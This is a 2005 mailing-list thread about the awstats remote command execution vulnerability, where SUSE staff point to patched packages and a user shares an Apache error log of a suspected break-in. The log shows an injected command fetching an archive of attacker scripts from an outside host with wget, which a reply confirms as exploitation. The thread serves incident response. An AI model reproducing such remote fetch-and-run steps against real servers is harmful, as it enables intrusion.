Re: awstats remote command execution vulerability
Hello: Is there any patch released for the awstats remote command execution vulerability from Jan 17th? More info here: http://lists.netsys.com/pipermail/full-disclosure/2005-January/031002.html Best Regards, Dimitar Slavov
On Tue, Feb 08, 2005 at 11:29:50AM -0800, Dimitar Slavov wrote:
Hello:
Is there any patch released for the awstats remote command execution vulerability from Jan 17th?
More info here: http://lists.netsys.com/pipermail/full-disclosure/2005-January/031002.html
Yes, we released awstats update for 9.1 and 9.2 on Jan 25th. Ciao, Marcus
On Tue, Feb 08, 2005 at 11:29:50AM -0800, Dimitar Slavov wrote:
Hello:
Hello.
Is there any patch released for the awstats remote command execution vulerability from Jan 17th?
More info here: http://lists.netsys.com/pipermail/full-disclosure/2005-January/031002.html
New packages were released jan 25. please use YOU or check our web site. -- Bye, Thomas -- Thomas Biege <thomas@suse.de>, SUSE LINUX AG, Security Support & Auditing -- Imagine there's no countries, It isnt hard to do, Nothing to kill or die for, No religion too, ... -- John Lennon (Imagine Lyrics)
Hi, I installed awstats myself and therefore did not recognize that it is vulnerable (via the YOU run). I'm afraid this night someone exploited this vulnerability. I found this log in my error_log ... [Thu Feb 24 02:00:44 2005] [error] [client 213.186.57.179] script not found or unable to stat: /usr/local/httpd/cgi-bin/awstats.pl sh: line 1: /awstats.ipi207.ipi.uni-hannover.de.conf: No such file or directory --02:05:09-- http://sm3naru.net/n.tgz => `n.tgz' Resolving sm3naru.net... done. Connecting to sm3naru.net[217.160.226.79]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 83,851 [text/plain] 0K .......... .......... .......... .......... .......... 61% 134.77 KB/s 50K .......... .......... .......... . 100% 10.38 MB/s 02:05:09 (218.95 KB/s) - `n.tgz' saved [83851/83851] ... n.tgz contains some icq-server scripts Can someone confirm that this is a exploitation of the awstats-error??? Why it is logged in the apache error-log? Thanks, Markus Thomas Biege wrote:
On Tue, Feb 08, 2005 at 11:29:50AM -0800, Dimitar Slavov wrote:
Hello:
Hello.
Is there any patch released for the awstats remote command execution vulerability from Jan 17th?
More info here: http://lists.netsys.com/pipermail/full-disclosure/2005-January/031002.html
New packages were released jan 25.
please use YOU or check our web site.
On Thu, Feb 24, 2005 at 10:16:33AM +0100, Markus Gerke wrote:
Hi, I installed awstats myself and therefore did not recognize that it is vulnerable (via the YOU run). I'm afraid this night someone exploited this vulnerability. I found this log in my error_log ... [Thu Feb 24 02:00:44 2005] [error] [client 213.186.57.179] script not found or unable to stat: /usr/local/httpd/cgi-bin/awstats.pl sh: line 1: /awstats.ipi207.ipi.uni-hannover.de.conf: No such file or directory --02:05:09-- http://sm3naru.net/n.tgz => `n.tgz' Resolving sm3naru.net... done. Connecting to sm3naru.net[217.160.226.79]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 83,851 [text/plain]
0K .......... .......... .......... .......... .......... 61% 134.77 KB/s 50K .......... .......... .......... . 100% 10.38 MB/s
02:05:09 (218.95 KB/s) - `n.tgz' saved [83851/83851] ...
n.tgz contains some icq-server scripts
Can someone confirm that this is a exploitation of the awstats-error??? Why it is logged in the apache error-log?
It is an exploitation. The error log probably logs all stderr output. Ciao, Marcus
participants (4)
-
Dimitar Slavov -
Marcus Meissner -
Markus Gerke -
Thomas Biege